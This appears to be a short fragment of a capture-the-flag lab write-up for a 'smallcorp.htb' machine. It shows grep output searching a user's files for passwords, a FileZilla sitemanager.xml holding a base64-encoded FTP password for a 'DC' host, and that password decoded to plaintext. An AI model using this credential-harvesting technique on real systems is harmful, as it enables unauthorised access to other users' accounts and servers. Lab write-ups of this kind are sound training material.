SSH with Georg

```rust
cripts/ff.py:        WebDriverWait(driver, 5).until(EC.element_to_be_clickable((By.XPATH, '//*[@id="password"]'))).click()
scripts/ff.py:        driver.find_element(By.XPATH, '//*[@id="password"]').send_keys(password)
.config/filezilla/filezilla.xml:                <Setting name="FTP Proxy password"></Setting>
.config/filezilla/filezilla.xml:                <Setting name="Proxy password"></Setting>
.config/filezilla/filezilla.xml:                <Setting name="Master password encryptor"></Setting>
.config/filezilla/filezilla.xml:                <Setting name="Prompt password save">0</Setting>
```

```rust
gkaufmann@orion.smallcorp.htb@workstation:~/.config/filezilla$ cat sitemanager.xml
<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.52.2" platform="*nix">
        <Servers>
                <Server>
                        <Host>192.168.1.2</Host>
                        <Port>21</Port>
                        <Protocol>0</Protocol>
                        <Type>0</Type>
                        <User>ftpuser</User>
                        <Pass encoding="base64">UGhhaW42aXo=</Pass>
                        <Logontype>1</Logontype>
                        <PasvMode>MODE_DEFAULT</PasvMode>
                        <EncodingType>Auto</EncodingType>
                        <BypassProxy>0</BypassProxy>
                        <Name>DC</Name>
                        <SyncBrowsing>0</SyncBrowsing>
                        <DirectoryComparison>0</DirectoryComparison>
                </Server>
        </Servers>
</FileZilla3>
```

base64 = Phain6iz